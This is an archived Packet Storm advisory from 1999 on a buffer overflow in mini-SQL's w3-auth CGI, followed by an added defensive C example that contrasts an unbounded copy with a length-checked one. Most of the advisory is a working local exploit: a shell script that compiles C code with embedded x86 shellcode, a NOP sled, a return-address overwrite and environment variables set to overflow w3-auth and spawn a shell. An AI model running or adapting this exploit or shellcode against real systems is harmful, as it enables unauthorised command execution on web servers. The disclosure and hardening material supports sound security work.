Linux_mini-sql_bof.txt

Reported by Packet Storm, 04 Oct 1999. Type: packetstorm. Source: packetstormsecurity.com

A buffer overflow in the w3-auth CGI (mini-SQL, Hughes Technology) allows remote command execution with the web server user's privileges.

Code
hi,  
  
i was looking for an exploitable buffer overflow in w3-msql  
(from Hughes Technology) since there were many security flaws  
inside.  
There is a static variable named PrivateScript in the main()  
function, 255 chars long.  
No luck ! main() finishes everywhere with an exit() call.  
The http internal server error produced with a big URI  
string (about 260 chars) is due to the modification of  
environment pointers in the stack just behind the return  
address and argv pointers.  
So the syscall getenv() produces a signal 11.  
  
No mind ! just take a look now in w3-auth.c :)  
and more specially in parseArgs().  
  
there is a static array of 30 chars named "var" and the  
function exits with a return.  
this is ok !  
It's now possible to force the w3-auth cgi-bin remotely to  
execute everything with httpd user privilege (and maybe  
to modify everything in the web server).  
However, to exploit this hole the attacker has to be  
authenticated by the cgi (the web server has to set the  
HTTP_AUTHORIZATION environment var).  
So there are two ways to use this exploit:  
  
1- the hacker is an official msql database admin but without  
httpd privilege (naturally !)  
2- the hacker starts by sniffing the network segment, steals  
an admin password and modifies the web server remotely.  
  
  
  
now the script (local version only, just the necessary time  
for Hughes to patch the source)   
  
  
#!/bin/sh  
  
cat > ./w3-3gg.c << _EOEXPLOIT  
  
/*******************************  
*****************  
  
  
Local Linux exploit for   
w3-auth   
Authentication module from mini-sql package  
  
Gregory Duchemin Aka c3RbeR  
  
Neurocom -- May 1999  
E-mail: [email protected]  
  
  
******************  
********************************/  
  
  
#include <stdio.h>  
#include <stdlib.h>  
#include <unistd.h>  
#include <string.h>  
#include <sys/param.h>  
#include <stdarg.h>  
  
  
#define GREEN "\033[1;32m"  
#define RED "\033[1;31m"  
#define NORM "\033[1;39m"  
#define NOP 0x90  
  
  
  
char *EGG;  
char *bob;  
long *ret;  
int size;  
  
  
long StackPointer();  
int usage(char *);  
void Thisistheend(long);  
  
  
/*  
Shellk0de from the great Phr4ck Ezine  
*/  
  
  
char shell[]=  
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"  
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"  
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";  
  
  
  
int main (int argc, char *argv[]){  
int cnt;  
unsigned long sp;  
int dec;  
sp = cnt = 0;  
  
  
  
if (argc>=4) usage(argv[0]);  
  
  
size=250;  
if (argc>=2) size=atoi(argv[1]);  
  
  
dec=15;  
if (argc>=3) dec=atoi(argv[2]);  
sp=StackPointer();  
sp-=dec;  
  
  
printf("%s\n Using buffer size = %d, return address = %02lX with stack offset = %d\n\n", GREEN, size, sp, dec);  
Thisistheend(sp);  
}  
  
  
  
/* Wh3re is my Stack P0inter ? Ask the esp register... */  
  
long StackPointer()  
{  
__asm__("movl %esp, %eax\n");   
}  
  
  
  
  
int usage (char *name)   
{  
printf("%s Usage:%s [size] [offset] \n",RED,name);  
printf("Default: %s 250 15 \n %s",name, NORM);  
exit(1);  
}  
  
  
  
  
void Thisistheend (long sp)   
{  
int cnt;  
  
  
if (!(EGG=(char *)malloc(size)))   
{  
perror("Malloc error\n\n");  
exit(1);  
}  
  
  
/* First Step....filling buffer with NoOperation */  
  
for(cnt=0;cnt<(size-1);cnt++)  
*(EGG+cnt)=NOP;  
  
  
/* Next, insert your own code */  
  
bob=EGG+80;  
for (cnt=0; cnt<strlen(shell); cnt++)  
*(bob++)=*(shell+cnt);  
  
  
/* Then, your return address in the stack to point toward the  
shell code */  
  
  
ret = (long *) (EGG+36);  
*(ret)=sp;  
  
  
  
EGG[size-1]='\0';  
  
  
/*  
apache sets these env variables  
Note: "Http authentication" means that script kiddy'll have  
to get a pass  
*/  
  
  
setenv("REQUEST_METHOD", "GET", 1);  
setenv("HTTP_USER_AGENT", EGG, 1);   
setenv("QUERY_STRING", EGG, 1);   
  
  
  
  
/* Simulate a good authentication locally */  
  
setenv("HTTP_AUTHORIZATION", "1", 1);  
  
  
system("/bin/sh -c \"echo -e \'\nReady to fight captain !\n\nLook at the env(s) and ...\n\nJust launch w3-auth and see...\n\n\n\'\"");  
system("/bin/sh");  
}  
_EOEXPLOIT  
  
  
gcc ./w3-3gg.c -o ./w3-3gg  
echo -e "\n\n Script started \n\n"  
./w3-3gg  
rm ./w3-3gg ./w3-3gg.c  
  
  
  
-------------------------------  
  
Gregory Duchemin  
  
Security Engineer  
  
NEUROCOM  
179-181 Av Charles de Gaulle  
92200 Neuilly sur Seine  
Tel: 01 41 43 84 84  
Fax: 01 41 43 84 80  
  
E-mail: [email protected]  
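The bug the post describes, a fixed 30-char stack array in parseArgs() filled from a CGI variable with no length check, modelled as an added example. This is not the original post's code and not the mini-SQL w3-auth.c sources (which are not on this page): the `name=value` layout, `VAR_SIZE`, and the `parse_var_*` function names are assumptions. It puts the vulnerable shape beside a bounded version that rejects over-long input instead of truncating it, and applies the same check to `QUERY_STRING` the way a CGI receives it.

```c
#include <stddef.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

#define VAR_SIZE 30   /* the "static array of 30 chars" named var (assumed layout) */

/* Vulnerable shape (constructed, not the real parseArgs): the name part of
 * "name=value" is copied into a fixed buffer with no bound on i. A name
 * longer than VAR_SIZE-1 chars runs past the array into the saved return
 * address, which is the condition the post's exploit depends on. Kept for
 * contrast only; it is never called on untrusted data here. */
void parse_var_unbounded(const char *arg, char *var)   /* var is char[VAR_SIZE] */
{
    size_t i = 0;
    while (arg[i] != '\0' && arg[i] != '=') {
        var[i] = arg[i];          /* no check against VAR_SIZE */
        i++;
    }
    var[i] = '\0';
}

/* Hardened form: the caller passes the buffer size, the copy is bounded,
 * and an over-long name is rejected (-1) rather than silently truncated,
 * so a caller cannot mistake a cut-off name for a valid one. */
int parse_var_bounded(const char *arg, char *var, size_t var_size)
{
    size_t i = 0;
    if (var_size == 0)
        return -1;
    while (arg[i] != '\0' && arg[i] != '=') {
        if (i + 1 >= var_size)    /* keep one byte for the terminator */
            return -1;
        var[i] = arg[i];
        i++;
    }
    var[i] = '\0';
    return 0;
}

/* Length of the name token before '=' (or of the whole string). */
size_t name_length(const char *arg)
{
    const char *eq = strchr(arg, '=');
    return eq ? (size_t)(eq - arg) : strlen(arg);
}

/* 1 if this argument would have overrun the unbounded version's array. */
int would_overflow(const char *arg)
{
    return name_length(arg) > VAR_SIZE - 1;
}

/* The same check as a CGI sees it: QUERY_STRING is set by the web server
 * from the request line, so it is attacker-controlled. Returns 0 when the
 * variable is absent or parses within bounds, -1 when it would overflow. */
int check_query_string_env(void)
{
    const char *qs = getenv("QUERY_STRING");
    char var[VAR_SIZE];
    if (qs == NULL)
        return 0;
    return parse_var_bounded(qs, var, sizeof var);
}

int main(void)
{
    char var[VAR_SIZE];
    const char *ok = "user=alice";        /* constructed sample input */
    char big[300];                         /* constructed: ~260+ chars, as in the post */
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';

    printf("%s -> %d\n", ok, parse_var_bounded(ok, var, sizeof var));
    printf("299 x 'A' -> %d (would_overflow=%d)\n",
           parse_var_bounded(big, var, sizeof var), would_overflow(big));
    return 0;
}
```

Rejecting rather than truncating matters for an authentication CGI: a truncated variable name could be matched against a different, shorter name, while a rejection leaves the caller with an unambiguous error to log. The length of `QUERY_STRING` (and, per the post, `HTTP_USER_AGENT`) is entirely chosen by the client, so the bound has to be enforced on the receiving side, not assumed from the request.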
